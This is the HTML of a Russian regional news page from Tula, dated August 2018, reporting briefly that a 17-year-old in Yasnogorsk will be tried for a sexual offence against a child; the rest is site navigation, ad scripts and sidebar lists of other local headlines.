<li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children td-menu-item td-normal-menu menu-item-49347"><a href="http://tulactive.ru/projects">Проекты</a>
<ul class="sub-menu">
	<li class="menu-item menu-item-type-post_type menu-item-object-page td-menu-item td-normal-menu menu-item-94944"><a href="http://tulactive.ru/reactor">Тула реактивная</a></li>
	<li class="menu-item menu-item-type-post_type menu-item-object-page td-menu-item td-normal-menu menu-item-94945"><a href="http://tulactive.ru/heroic">Тула героическая</a></li>
	<li class="menu-item menu-item-type-post_type menu-item-object-page td-menu-item td-normal-menu menu-item-94946"><a href="http://tulactive.ru/radioactive">Тула радиоактивная</a></li>
</ul>
</li>
<li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-home menu-item-has-children td-menu-item td-normal-menu menu-item-93399"><a href="http://tulactive.ru">Другое</a>
<ul class="sub-menu">
	<li class="menu-item menu-item-type-post_type menu-item-object-page td-menu-item td-normal-menu menu-item-51776"><a href="http://tulactive.ru/articles">Статьи</a></li>
	<li class="menu-item menu-item-type-post_type menu-item-object-page td-menu-item td-normal-menu menu-item-51772"><a href="http://tulactive.ru/special">Спецматериалы</a></li>
	<li class="menu-item menu-item-type-post_type menu-item-object-page td-menu-item td-normal-menu menu-item-51781"><a href="http://tulactive.ru/experts">Эксперты</a></li>
</ul>
</li>
</ul></div></div>


<div class="td-search-wrapper">
    <div id="td-top-search">
        <!-- Search -->
        <div class="header-search-wrap">
            <div class="dropdown header-search">
                <a id="td-header-search-button" href="#" role="button" class="dropdown-toggle " data-toggle="dropdown"><i class="td-icon-search"></i></a>
                <a id="td-header-search-button-mob" href="#" role="button" class="dropdown-toggle " data-toggle="dropdown"><i class="td-icon-search"></i></a>
            </div>
        </div>
    </div>
</div>

<div class="header-search-wrap">
	<div class="dropdown header-search">
		<div class="td-drop-down-search" aria-labelledby="td-header-search-button">
			<form method="get" class="td-search-form" action="http://tulactive.ru/">
				<div role="search" class="td-head-form-search-wrap">
					<input id="td-header-search" type="text" value="" name="s" autocomplete="off" /><input class="wpb_button wpb_btn-inverse btn" type="submit" id="td-header-search-top" value="Поиск" />
				</div>
			</form>
			<div id="td-aj-search"></div>
		</div>
	</div>
</div>            </div>
        </div>
    </div>

    <div class="td-banner-wrap-full">
        <div class="td-header-container td-header-row td-header-header">
            <div class="td-header-sp-recs">
                <div class="td-header-rec-wrap">
    
</div>            </div>
        </div>
    </div>

</div><div class="td-main-content-wrap">

    <div class="td-container td-post-template-default ">
        <div class="td-crumb-container"></div>

        <div class="td-pb-row">
                                    <div class="td-pb-span8 td-main-content" role="main">
                            <div class="td-ss-main-content">
                                
    <article id="post-109272" class="post-109272 post type-post status-publish format-standard has-post-thumbnail hentry category-districts category-newstula category-society tag-136 tag-1334 tag-2033 tag-83 tag-378 tag-397" itemscope itemtype="http://schema.org/Article">
		
        <div class="td-post-header">			
            <header class="td-post-title">
                <h1 class="entry-title">В Ясногорске 17-летнего подростка будут судить за педофилию</h1>

                
<p><span style="color: #666; font-size:12px"><time datetime="2018-08-09" class="post-date updated" pubdate>
9 Авг 2018 15:52</time></p>
            </header>

        </div>

        

        <div class="td-post-content">
        <div class="td-post-featured-image"><a href="http://tulactive.ru/wp-content/uploads/2018/08/femida_1.jpg" data-caption=""><img width="696" height="522" class="entry-thumb td-modal-image" src="http://tulactive.ru/wp-content/uploads/2018/08/femida_1-696x522.jpg" srcset="http://tulactive.ru/wp-content/uploads/2018/08/femida_1-696x522.jpg 696w, http://tulactive.ru/wp-content/uploads/2018/08/femida_1-300x225.jpg 300w, http://tulactive.ru/wp-content/uploads/2018/08/femida_1-768x576.jpg 768w, http://tulactive.ru/wp-content/uploads/2018/08/femida_1-80x60.jpg 80w, http://tulactive.ru/wp-content/uploads/2018/08/femida_1-265x198.jpg 265w, http://tulactive.ru/wp-content/uploads/2018/08/femida_1-560x420.jpg 560w, http://tulactive.ru/wp-content/uploads/2018/08/femida_1.jpg 800w" sizes="(max-width: 696px) 100vw, 696px" alt="" title="femida_1"/></a></div><script src="https://yastatic.net/share2/share.js" async="async"></script> 
<div class="ya-share2" data-services="vkontakte,facebook,odnoklassniki,twitter,telegram"></div>
        <p>В Ясногорском районе 17-летний подросток обвиняется в совершении преступления против половой неприкосновенности малолетнего.<br />
<span id="more-109272"></span><br />
В ходе следствия установлено, что летом 2017 года обвиняемый в подвале бывшего детского сада совершил в отношении малолетнего действия сексуального характера. Было возбуждено уголовное дело по п. «б» ч. 4 ст. 132 УК РФ. Обвиняемый заключён под стражу.</p>
<p>Как сообщили в прокуратуре Тульской области, после утверждения обвинительного заключения уголовное дело направлено в Ясногорский районный суд.</p>
<div class="td-a-rec td-a-rec-id-content_bottom  "><!-- Yandex.RTB R-A-148435-53 -->
<div id="yandex_rtb_R-A-148435-53"></div>
<script type="text/javascript">
    (function(w, d, n, s, t) {
        w[n] = w[n] || [];
        w[n].push(function() {
            Ya.Context.AdvManager.render({
                blockId: "R-A-148435-53",
                renderTo: "yandex_rtb_R-A-148435-53",
                async: true
            });
        });
        t = d.getElementsByTagName("script")[0];
        s = d.createElement("script");
        s.type = "text/javascript";
        s.src = "//an.yandex.ru/system/context.js";
        s.async = true;
        t.parentNode.insertBefore(s, t);
    })(this, this.document, "yandexContextAsyncCallbacks");
</script></div>        </div>

        <footer>
                        
            <div class="td-post-source-tags">
                                <ul class="td-tags td-post-small-box clearfix"><li><span>ТЕГИ</span></li><li><a href="http://tulactive.ru/news/tag/%d0%b4%d0%b5%d1%82%d0%b8">дети</a></li><li><a href="http://tulactive.ru/news/tag/%d0%ba%d1%80%d0%b8%d0%bc%d0%b8%d0%bd%d0%b0%d0%bb">криминал</a></li><li><a href="http://tulactive.ru/news/tag/%d0%bf%d0%b5%d0%b4%d0%be%d1%84%d0%b8%d0%bb%d1%8b">педофилы</a></li><li><a href="http://tulactive.ru/news/tag/%d0%bf%d1%80%d0%be%d0%ba%d1%83%d1%80%d0%b0%d1%82%d1%83%d1%80%d0%b0">прокуратура</a></li><li><a href="http://tulactive.ru/news/tag/%d1%81%d1%83%d0%b4">суд</a></li><li><a href="http://tulactive.ru/news/tag/%d1%8f%d1%81%d0%bd%d0%be%d0%b3%d0%be%d1%80%d1%81%d0%ba">Ясногорск</a></li></ul>            </div>

                                    <div class="td-author-name vcard author" style="display: none"><span class="fn"><a href="http://tulactive.ru/news/author/adminster">Tulactive</a></span></div>	        <span style="display: none;" itemprop="author" itemscope itemtype="https://schema.org/Person"><meta itemprop="name" content="Tulactive"></span><meta itemprop="datePublished" content="2018-08-09T15:52:38+00:00"><meta itemprop="dateModified" content="2018-08-09T15:36:56+00:00"><meta itemscope itemprop="mainEntityOfPage" itemType="https://schema.org/WebPage" itemid="http://tulactive.ru/news/109272"/><span style="display: none;" itemprop="publisher" itemscope itemtype="https://schema.org/Organization"><span style="display: none;" itemprop="logo" itemscope itemtype="https://schema.org/ImageObject"><meta itemprop="url" content="http://tulactive.ru/wp-content/uploads/2017/11/logotip_tulactive.png"></span><meta itemprop="name" content="Тула активная"></span><meta itemprop="headline " content="В Ясногорске 17-летнего подростка будут судить за педофилию"><span style="display: none;" itemprop="image" itemscope itemtype="https://schema.org/ImageObject"><meta itemprop="url" content="http://tulactive.ru/wp-content/uploads/2018/08/femida_1.jpg"><meta itemprop="width" content="800"><meta itemprop="height" content="600"></span>        </footer>
    </article> <!-- /.post -->
                                </div>
                        </div>
                        <div class="td-pb-span4 td-main-sidebar" role="complementary">
                            <div class="td-ss-main-sidebar">
                                <div class="td_block_wrap td_block_3 td_block_widget td_uid_3_5b6c94d92176c_rand td-pb-border-top td_block_template_8"  data-td-block-uid="td_uid_3_5b6c94d92176c" ><script>var block_td_uid_3_5b6c94d92176c = new tdBlock();
block_td_uid_3_5b6c94d92176c.id = "td_uid_3_5b6c94d92176c";
block_td_uid_3_5b6c94d92176c.atts = '{"limit":"1","sort":"","post_ids":"","tag_slug":"\u043f\u043e\u0432\u044b\u0448\u0435\u043d\u0438\u0435-\u043f\u0435\u043d\u0441\u0438\u043e\u043d\u043d\u043e\u0433\u043e-\u0432\u043e\u0437\u0440\u0430\u0441\u0442\u0430","autors_id":"","installed_post_types":"","category_id":"","category_ids":"","custom_title":"\u041f\u0435\u043d\u0441\u0438\u043e\u043d\u043d\u0430\u044f \u0440\u0435\u0444\u043e\u0440\u043c\u0430","custom_url":"http:\/\/tulactive.ru\/pensii-reform","show_child_cat":"","sub_cat_ajax":"","ajax_pagination":"","header_color":"","header_text_color":"#","ajax_pagination_infinite_stop":"","td_column_number":1,"td_ajax_preloading":"","td_ajax_filter_type":"","td_ajax_filter_ids":"","td_filter_default_txt":"All","color_preset":"","border_top":"","class":"td_block_widget td_uid_3_5b6c94d92176c_rand","el_class":"","offset":"","css":"","tdc_css":"","tdc_css_class":"td_uid_3_5b6c94d92176c_rand","live_filter":"","live_filter_cur_post_id":"","live_filter_cur_post_author":"","block_template_id":""}';
block_td_uid_3_5b6c94d92176c.td_column_number = "1";
block_td_uid_3_5b6c94d92176c.block_type = "td_block_3";
block_td_uid_3_5b6c94d92176c.post_count = "1";
block_td_uid_3_5b6c94d92176c.found_posts = "26";
block_td_uid_3_5b6c94d92176c.header_color = "";
block_td_uid_3_5b6c94d92176c.ajax_pagination_infinite_stop = "";
block_td_uid_3_5b6c94d92176c.max_num_pages = "26";
tdBlocksArray.push(block_td_uid_3_5b6c94d92176c);
</script><div class="td-block-title-wrap"><h4 class="td-block-title"><a href="http://tulactive.ru/pensii-reform">Пенсионная реформа</a></h4></div><div id=td_uid_3_5b6c94d92176c class="td_block_inner">

	<div class="td-block-span12">

        <div class="td_module_1 td_module_wrap td-animation-stack">
            <div class="td-module-image">
                <div class="td-module-thumb"><a href="http://tulactive.ru/news/109249" rel="bookmark" title="ЦИК одобрил три вопроса для референдума о пенсионном возрасте"><img width="324" height="160" class="entry-thumb" src="http://tulactive.ru/wp-content/uploads/2018/07/miting_pensii_4-324x160.jpg" srcset="http://tulactive.ru/wp-content/uploads/2018/07/miting_pensii_4-324x160.jpg 324w, http://tulactive.ru/wp-content/uploads/2018/07/miting_pensii_4-533x261.jpg 533w" sizes="(max-width: 324px) 100vw, 324px" alt="" title="ЦИК одобрил три вопроса для референдума о пенсионном возрасте"/></a></div>                            </div>
            <h3 class="entry-title td-module-title"><a href="http://tulactive.ru/news/109249" rel="bookmark" title="ЦИК одобрил три вопроса для референдума о пенсионном возрасте">ЦИК одобрил три вопроса для референдума о пенсионном возрасте</a></h3>
            <div class="td-module-meta-info">
                                <span class="td-post-date"><time class="entry-date updated td-module-date" datetime="2018-08-09T10:03:24+00:00" >09.08.2018</time></span>                            </div>

            
        </div>

        
	</div> <!-- ./td-block-span12 --></div></div> <!-- ./block --><div class="td_block_wrap td_block_3 td_block_widget td_uid_4_5b6c94d92543e_rand td-pb-border-top td_block_template_8"  data-td-block-uid="td_uid_4_5b6c94d92543e" ><script>var block_td_uid_4_5b6c94d92543e = new tdBlock();
block_td_uid_4_5b6c94d92543e.id = "td_uid_4_5b6c94d92543e";
block_td_uid_4_5b6c94d92543e.atts = '{"limit":"1","sort":"","post_ids":"","tag_slug":"\u043f\u043f\u043f","autors_id":"","installed_post_types":"","category_id":"","category_ids":"","custom_title":"\u0421\u0443\u0432\u043e\u0440\u043e\u0432\u0441\u043a\u0438\u0435 \u043f\u0430\u0440\u0442\u0438\u0437\u0430\u043d\u044b","custom_url":"http:\/\/tulactive.ru\/suvorov-partizans","show_child_cat":"","sub_cat_ajax":"","ajax_pagination":"","header_color":"","header_text_color":"#","ajax_pagination_infinite_stop":"","td_column_number":1,"td_ajax_preloading":"","td_ajax_filter_type":"","td_ajax_filter_ids":"","td_filter_default_txt":"All","color_preset":"","border_top":"","class":"td_block_widget td_uid_4_5b6c94d92543e_rand","el_class":"","offset":"","css":"","tdc_css":"","tdc_css_class":"td_uid_4_5b6c94d92543e_rand","live_filter":"","live_filter_cur_post_id":"","live_filter_cur_post_author":"","block_template_id":""}';
block_td_uid_4_5b6c94d92543e.td_column_number = "1";
block_td_uid_4_5b6c94d92543e.block_type = "td_block_3";
block_td_uid_4_5b6c94d92543e.post_count = "1";
block_td_uid_4_5b6c94d92543e.found_posts = "12";
block_td_uid_4_5b6c94d92543e.header_color = "";
block_td_uid_4_5b6c94d92543e.ajax_pagination_infinite_stop = "";
block_td_uid_4_5b6c94d92543e.max_num_pages = "12";
tdBlocksArray.push(block_td_uid_4_5b6c94d92543e);
</script><div class="td-block-title-wrap"><h4 class="td-block-title"><a href="http://tulactive.ru/suvorov-partizans">Суворовские партизаны</a></h4></div><div id=td_uid_4_5b6c94d92543e class="td_block_inner">

	<div class="td-block-span12">

        <div class="td_module_1 td_module_wrap td-animation-stack">
            <div class="td-module-image">
                <div class="td-module-thumb"><a href="http://tulactive.ru/news/108878" rel="bookmark" title="У московских &laquo;последователей Меняйлова&raquo; прошли обыски, среди них украинка с британским подданством. Силовики ищут &laquo;руку Запада&raquo;"><img width="324" height="160" class="entry-thumb" src="http://tulactive.ru/wp-content/uploads/2018/08/ppp-324x160.jpg" srcset="http://tulactive.ru/wp-content/uploads/2018/08/ppp-324x160.jpg 324w, http://tulactive.ru/wp-content/uploads/2018/08/ppp-533x261.jpg 533w" sizes="(max-width: 324px) 100vw, 324px" alt="" title="У московских &laquo;последователей Меняйлова&raquo; прошли обыски, среди них украинка с британским подданством. Силовики ищут &laquo;руку Запада&raquo;"/></a></div>                            </div>
            <h3 class="entry-title td-module-title"><a href="http://tulactive.ru/news/108878" rel="bookmark" title="У московских &laquo;последователей Меняйлова&raquo; прошли обыски, среди них украинка с британским подданством. Силовики ищут &laquo;руку Запада&raquo;">У московских &laquo;последователей Меняйлова&raquo; прошли обыски, среди них украинка с британским подданством. Силовики ищут &laquo;руку Запада&raquo;</a></h3>
            <div class="td-module-meta-info">
                                <span class="td-post-date"><time class="entry-date updated td-module-date" datetime="2018-08-02T21:15:36+00:00" >02.08.2018</time></span>                            </div>

            
        </div>

        
	</div> <!-- ./td-block-span12 --></div></div> <!-- ./block --><div class="td_block_wrap td_block_18 td_block_widget td_uid_5_5b6c94d928976_rand td-pb-border-top td_block_template_8"  data-td-block-uid="td_uid_5_5b6c94d928976" >
<style scoped>
.td_uid_5_5b6c94d928976_rand .td-block-title > *:before {
                background-color: #4db2ec !important;
            }
</style><script>var block_td_uid_5_5b6c94d928976 = new tdBlock();
block_td_uid_5_5b6c94d928976.id = "td_uid_5_5b6c94d928976";
block_td_uid_5_5b6c94d928976.atts = '{"limit":"20","sort":"","post_ids":"","tag_slug":"","autors_id":"","installed_post_types":"","category_id":"","category_ids":"","custom_title":"\u041d\u041e\u0412\u041e\u0421\u0422\u0418","custom_url":"http:\/\/tulactive.ru\/news","show_child_cat":"","sub_cat_ajax":"","ajax_pagination":"","header_color":"","header_text_color":"#","ajax_pagination_infinite_stop":"","td_column_number":1,"td_ajax_preloading":"","td_ajax_filter_type":"","td_ajax_filter_ids":"","td_filter_default_txt":"All","color_preset":"","border_top":"","class":"td_block_widget td_uid_5_5b6c94d928976_rand","el_class":"","offset":"","css":"","tdc_css":"","tdc_css_class":"td_uid_5_5b6c94d928976_rand","live_filter":"","live_filter_cur_post_id":"","live_filter_cur_post_author":"","block_template_id":"td_block_template_8"}';
block_td_uid_5_5b6c94d928976.td_column_number = "1";
block_td_uid_5_5b6c94d928976.block_type = "td_block_18";
block_td_uid_5_5b6c94d928976.post_count = "20";
block_td_uid_5_5b6c94d928976.found_posts = "16841";
block_td_uid_5_5b6c94d928976.header_color = "";
block_td_uid_5_5b6c94d928976.ajax_pagination_infinite_stop = "";
block_td_uid_5_5b6c94d928976.max_num_pages = "843";
tdBlocksArray.push(block_td_uid_5_5b6c94d928976);
</script><div class="td-block-title-wrap"><h4 class="td-block-title"><a href="http://tulactive.ru/news">НОВОСТИ</a></h4></div><div id=td_uid_5_5b6c94d928976 class="td_block_inner td-column-1">
        <div class="td_module_mx8 td_module_wrap td-animation-stack">
            <div class="meta-info-container">
                <div class="td-module-thumb"><a href="http://tulactive.ru/news/109295" rel="bookmark" title="К одоевским чиновникам пришли с обыском"><img width="696" height="385" class="entry-thumb" src="http://tulactive.ru/wp-content/uploads/2018/08/obysk_Odoev-696x385.jpg" alt="" title="К одоевским чиновникам пришли с обыском"/></a></div>
                <div class="td-module-meta-info">
                    <h3 class="entry-title td-module-title"><a href="http://tulactive.ru/news/109295" rel="bookmark" title="К одоевским чиновникам пришли с обыском">К одоевским чиновникам пришли с обыском</a></h3>                                        <span class="td-author-date">
                                                <span class="td-post-date"><time class="entry-date updated td-module-date" datetime="2018-08-09T19:47:32+00:00" >09.08.2018</time></span>                                            </span>
                </div>
            </div>

        </div>

        
        <div class="td_module_mx2 td_module_wrap td-animation-stack">

            <div class="td-module-thumb"><a href="http://tulactive.ru/news/109289" rel="bookmark" title="Резидентов ефремовской ТОСЭР на пять лет освободят от налогов,"><img width="80" height="60" class="entry-thumb" src="http://tulactive.ru/wp-content/uploads/2018/08/Andrianov_1-80x60.jpg" srcset="http://tulactive.ru/wp-content/uploads/2018/08/Andrianov_1-80x60.jpg 80w, http://tulactive.ru/wp-content/uploads/2018/08/Andrianov_1-300x225.jpg 300w, http://tulactive.ru/wp-content/uploads/2018/08/Andrianov_1-768x576.jpg 768w, http://tulactive.ru/wp-content/uploads/2018/08/Andrianov_1-265x198.jpg 265w, http://tulactive.ru/wp-content/uploads/2018/08/Andrianov_1-696x522.jpg 696w, http://tulactive.ru/wp-content/uploads/2018/08/Andrianov_1-560x420.jpg 560w, http://tulactive.ru/wp-content/uploads/2018/08/Andrianov_1.jpg 800w" sizes="(max-width: 80px) 100vw, 80px" alt="" title="Резидентов ефремовской ТОСЭР на пять лет освободят от налогов,"/></a></div>
            <div class="item-details">
                <h3 class="entry-title td-module-title"><a href="http://tulactive.ru/news/109289" rel="bookmark" title="Резидентов ефремовской ТОСЭР на пять лет освободят от налогов,">Резидентов ефремовской ТОСЭР на пять лет освободят от налогов,</a></h3>                <div class="td-module-meta-info">
                                                            <span class="td-post-date"><time class="entry-date updated td-module-date" datetime="2018-08-09T19:23:35+00:00" >09.08.2018</time></span>                                    </div>
            </div>

        </div>

        
        <div class="td_module_mx2 td_module_wrap td-animation-stack">

            <div class="td-module-thumb"><a href="http://tulactive.ru/news/109280" rel="bookmark" title="Прокурор Тульской области в Тулу не спешит"><img width="80" height="60" class="entry-thumb" src="http://tulactive.ru/wp-content/uploads/2016/08/prokuratura_2-80x60.jpg" srcset="http://tulactive.ru/wp-content/uploads/2016/08/prokuratura_2-80x60.jpg 80w, http://tulactive.ru/wp-content/uploads/2016/08/prokuratura_2-300x225.jpg 300w, http://tulactive.ru/wp-content/uploads/2016/08/prokuratura_2-768x576.jpg 768w, http://tulactive.ru/wp-content/uploads/2016/08/prokuratura_2-265x198.jpg 265w, http://tulactive.ru/wp-content/uploads/2016/08/prokuratura_2-696x522.jpg 696w, http://tulactive.ru/wp-content/uploads/2016/08/prokuratura_2-560x420.jpg 560w, http://tulactive.ru/wp-content/uploads/2016/08/prokuratura_2.jpg 800w" sizes="(max-width: 80px) 100vw, 80px" alt="прокуратура Тула" title="Прокурор Тульской области в Тулу не спешит"/></a></div>
            <div class="item-details">
                <h3 class="entry-title td-module-title"><a href="http://tulactive.ru/news/109280" rel="bookmark" title="Прокурор Тульской области в Тулу не спешит">Прокурор Тульской области в Тулу не спешит</a></h3>                <div class="td-module-meta-info">
                                                            <span class="td-post-date"><time class="entry-date updated td-module-date" datetime="2018-08-09T18:19:23+00:00" >09.08.2018</time></span>                                    </div>
            </div>

        </div>

        
        <div class="td_module_mx2 td_module_wrap td-animation-stack">

            <div class="td-module-thumb"><a href="http://tulactive.ru/news/109277" rel="bookmark" title="С чем пришли узловчане к главе областного СК"><img width="80" height="60" class="entry-thumb" src="http://tulactive.ru/wp-content/uploads/2018/08/Starikov_8-80x60.jpg" srcset="http://tulactive.ru/wp-content/uploads/2018/08/Starikov_8-80x60.jpg 80w, http://tulactive.ru/wp-content/uploads/2018/08/Starikov_8-300x225.jpg 300w, http://tulactive.ru/wp-content/uploads/2018/08/Starikov_8-768x576.jpg 768w, http://tulactive.ru/wp-content/uploads/2018/08/Starikov_8-265x198.jpg 265w, http://tulactive.ru/wp-content/uploads/2018/08/Starikov_8-696x522.jpg 696w, http://tulactive.ru/wp-content/uploads/2018/08/Starikov_8-560x420.jpg 560w, http://tulactive.ru/wp-content/uploads/2018/08/Starikov_8.jpg 800w" sizes="(max-width: 80px) 100vw, 80px" alt="" title="С чем пришли узловчане к главе областного СК"/></a></div>
            <div class="item-details">
                <h3 class="entry-title td-module-title"><a href="http://tulactive.ru/news/109277" rel="bookmark" title="С чем пришли узловчане к главе областного СК">С чем пришли узловчане к главе областного СК</a></h3>                <div class="td-module-meta-info">
                                                            <span class="td-post-date"><time class="entry-date updated td-module-date" datetime="2018-08-09T17:05:02+00:00" >09.08.2018</time></span>                                    </div>
            </div>

        </div>

        
        <div class="td_module_mx2 td_module_wrap td-animation-stack">

            <div class="td-module-thumb"><a href="http://tulactive.ru/news/109272" rel="bookmark" title="В Ясногорске 17-летнего подростка будут судить за педофилию"><img width="80" height="60" class="entry-thumb" src="http://tulactive.ru/wp-content/uploads/2018/08/femida_1-80x60.jpg" srcset="http://tulactive.ru/wp-content/uploads/2018/08/femida_1-80x60.jpg 80w, http://tulactive.ru/wp-content/uploads/2018/08/femida_1-300x225.jpg 300w, http://tulactive.ru/wp-content/uploads/2018/08/femida_1-768x576.jpg 768w, http://tulactive.ru/wp-content/uploads/2018/08/femida_1-265x198.jpg 265w, http://tulactive.ru/wp-content/uploads/2018/08/femida_1-696x522.jpg 696w, http://tulactive.ru/wp-content/uploads/2018/08/femida_1-560x420.jpg 560w, http://tulactive.ru/wp-content/uploads/2018/08/femida_1.jpg 800w" sizes="(max-width: 80px) 100vw, 80px" alt="" title="В Ясногорске 17-летнего подростка будут судить за педофилию"/></a></div>
            <div class="item-details">
                <h3 class="entry-title td-module-title"><a href="http://tulactive.ru/news/109272" rel="bookmark" title="В Ясногорске 17-летнего подростка будут судить за педофилию">В Ясногорске 17-летнего подростка будут судить за педофилию</a></h3>                <div class="td-module-meta-info">
                                                            <span class="td-post-date"><time class="entry-date updated td-module-date" datetime="2018-08-09T15:52:38+00:00" >09.08.2018</time></span>                                    </div>
            </div>

        </div>

        
        <div class="td_module_mx2 td_module_wrap td-animation-stack">

            <div class="td-module-thumb"><a href="http://tulactive.ru/news/109120" rel="bookmark" title="Найдены виновные в росте цен на бензин"><img width="80" height="60" class="entry-thumb" src="http://tulactive.ru/wp-content/uploads/2016/05/Medvedev_monetka-80x60.jpg" srcset="http://tulactive.ru/wp-content/uploads/2016/05/Medvedev_monetka-80x60.jpg 80w, http://tulactive.ru/wp-content/uploads/2016/05/Medvedev_monetka-300x225.jpg 300w, http://tulactive.ru/wp-content/uploads/2016/05/Medvedev_monetka-768x576.jpg 768w, http://tulactive.ru/wp-content/uploads/2016/05/Medvedev_monetka-265x198.jpg 265w, http://tulactive.ru/wp-content/uploads/2016/05/Medvedev_monetka-696x522.jpg 696w, http://tulactive.ru/wp-content/uploads/2016/05/Medvedev_monetka-560x420.jpg 560w, http://tulactive.ru/wp-content/uploads/2016/05/Medvedev_monetka.jpg 800w" sizes="(max-width: 80px) 100vw, 80px" alt="" title="Найдены виновные в росте цен на бензин"/></a></div>
            <div class="item-details">
                <h3 class="entry-title td-module-title"><a href="http://tulactive.ru/news/109120" rel="bookmark" title="Найдены виновные в росте цен на бензин">Найдены виновные в росте цен на бензин</a></h3>                <div class="td-module-meta-info">
                                                            <span class="td-post-date"><time class="entry-date updated td-module-date" datetime="2018-08-09T14:45:56+00:00" >09.08.2018</time></span>                                    </div>
            </div>

        </div>

        
        <div class="td_module_mx2 td_module_wrap td-animation-stack">

            <div class="td-module-thumb"><a href="http://tulactive.ru/news/109238" rel="bookmark" title="На территории Тульского онкодиспансера до конца года построят часовню"><img width="80" height="60" class="entry-thumb" src="http://tulactive.ru/wp-content/uploads/2016/03/onkodispanser-80x60.jpg" srcset="http://tulactive.ru/wp-content/uploads/2016/03/onkodispanser-80x60.jpg 80w, http://tulactive.ru/wp-content/uploads/2016/03/onkodispanser-300x225.jpg 300w, http://tulactive.ru/wp-content/uploads/2016/03/onkodispanser-768x576.jpg 768w, http://tulactive.ru/wp-content/uploads/2016/03/onkodispanser-265x198.jpg 265w, http://tulactive.ru/wp-content/uploads/2016/03/onkodispanser-696x522.jpg 696w, http://tulactive.ru/wp-content/uploads/2016/03/onkodispanser-560x420.jpg 560w, http://tulactive.ru/wp-content/uploads/2016/03/onkodispanser.jpg 800w" sizes="(max-width: 80px) 100vw, 80px" alt="" title="На территории Тульского онкодиспансера до конца года построят часовню"/></a></div>
            <div class="item-details">
                <h3 class="entry-title td-module-title"><a href="http://tulactive.ru/news/109238" rel="bookmark" title="На территории Тульского онкодиспансера до конца года построят часовню">На территории Тульского онкодиспансера до конца года построят часовню</a></h3>                <div class="td-module-meta-info">
                                                            <span class="td-post-date"><time class="entry-date updated td-module-date" datetime="2018-08-09T13:38:56+00:00" >09.08.2018</time></span>                                    </div>
            </div>

        </div>

        
        <div class="td_module_mx2 td_module_wrap td-animation-stack">

            <div class="td-module-thumb"><a href="http://tulactive.ru/news/109242" rel="bookmark" title="В субботу на площади Ленина у туляков проверят мужское здоровье"><img width="80" height="60" class="entry-thumb" src="http://tulactive.ru/wp-content/uploads/2018/08/zaryadka_3-80x60.jpg" srcset="http://tulactive.ru/wp-content/uploads/2018/08/zaryadka_3-80x60.jpg 80w, http://tulactive.ru/wp-content/uploads/2018/08/zaryadka_3-300x225.jpg 300w, http://tulactive.ru/wp-content/uploads/2018/08/zaryadka_3-768x576.jpg 768w, http://tulactive.ru/wp-content/uploads/2018/08/zaryadka_3-265x198.jpg 265w, http://tulactive.ru/wp-content/uploads/2018/08/zaryadka_3-696x522.jpg 696w, http://tulactive.ru/wp-content/uploads/2018/08/zaryadka_3-560x420.jpg 560w, http://tulactive.ru/wp-content/uploads/2018/08/zaryadka_3.jpg 800w" sizes="(max-width: 80px) 100vw, 80px" alt="" title="В субботу на площади Ленина у туляков проверят мужское здоровье"/></a></div>
            <div class="item-details">
                <h3 class="entry-title td-module-title"><a href="http://tulactive.ru/news/109242" rel="bookmark" title="В субботу на площади Ленина у туляков проверят мужское здоровье">В субботу на площади Ленина у туляков проверят мужское здоровье</a></h3>                <div class="td-module-meta-info">
                                                            <span class="td-post-date"><time class="entry-date updated td-module-date" datetime="2018-08-09T12:24:06+00:00" >09.08.2018</time></span>                                    </div>
            </div>

        </div>

        
        <div class="td_module_mx2 td_module_wrap td-animation-stack">

            <div class="td-module-thumb"><a href="http://tulactive.ru/news/109244" rel="bookmark" title="Авилов составил план ремонта ливнёвок"><img width="80" height="60" class="entry-thumb" src="http://tulactive.ru/wp-content/uploads/2018/07/liven_6-80x60.jpg" srcset="http://tulactive.ru/wp-content/uploads/2018/07/liven_6-80x60.jpg 80w, http://tulactive.ru/wp-content/uploads/2018/07/liven_6-300x225.jpg 300w, http://tulactive.ru/wp-content/uploads/2018/07/liven_6-768x576.jpg 768w, http://tulactive.ru/wp-content/uploads/2018/07/liven_6-265x198.jpg 265w, http://tulactive.ru/wp-content/uploads/2018/07/liven_6-696x522.jpg 696w, http://tulactive.ru/wp-content/uploads/2018/07/liven_6-560x420.jpg 560w, http://tulactive.ru/wp-content/uploads/2018/07/liven_6.jpg 800w" sizes="(max-width: 80px) 100vw, 80px" alt="" title="Авилов составил план ремонта ливнёвок"/></a></div>
            <div class="item-details">
                <h3 class="entry-title td-module-title"><a href="http://tulactive.ru/news/109244" rel="bookmark" title="Авилов составил план ремонта ливнёвок">Авилов составил план ремонта ливнёвок</a></h3>                <div class="td-module-meta-info">
                                                            <span class="td-post-date"><time class="entry-date updated td-module-date" datetime="2018-08-09T11:17:18+00:00" >09.08.2018</time></span>                                    </div>
            </div>

        </div>

        
        <div class="td_module_mx2 td_module_wrap td-animation-stack">

            <div class="td-module-thumb"><a href="http://tulactive.ru/news/109249" rel="bookmark" title="ЦИК одобрил три вопроса для референдума о пенсионном возрасте"><img width="80" height="60" class="entry-thumb" src="http://tulactive.ru/wp-content/uploads/2018/07/miting_pensii_4-80x60.jpg" srcset="http://tulactive.ru/wp-content/uploads/2018/07/miting_pensii_4-80x60.jpg 80w, http://tulactive.ru/wp-content/uploads/2018/07/miting_pensii_4-300x225.jpg 300w, http://tulactive.ru/wp-content/uploads/2018/07/miting_pensii_4-768x576.jpg 768w, http://tulactive.ru/wp-content/uploads/2018/07/miting_pensii_4-265x198.jpg 265w, http://tulactive.ru/wp-content/uploads/2018/07/miting_pensii_4-696x522.jpg 696w, http://tulactive.ru/wp-content/uploads/2018/07/miting_pensii_4-560x420.jpg 560w, http://tulactive.ru/wp-content/uploads/2018/07/miting_pensii_4.jpg 800w" sizes="(max-width: 80px) 100vw, 80px" alt="" title="ЦИК одобрил три вопроса для референдума о пенсионном возрасте"/></a></div>
            <div class="item-details">
                <h3 class="entry-title td-module-title"><a href="http://tulactive.ru/news/109249" rel="bookmark" title="ЦИК одобрил три вопроса для референдума о пенсионном возрасте">ЦИК одобрил три вопроса для референдума о пенсионном возрасте</a></h3>                <div class="td-module-meta-info">
                                                            <span class="td-post-date"><time class="entry-date updated td-module-date" datetime="2018-08-09T10:03:24+00:00" >09.08.2018</time></span>                                    </div>
            </div>

        </div>

        
        <div class="td_module_mx2 td_module_wrap td-animation-stack">

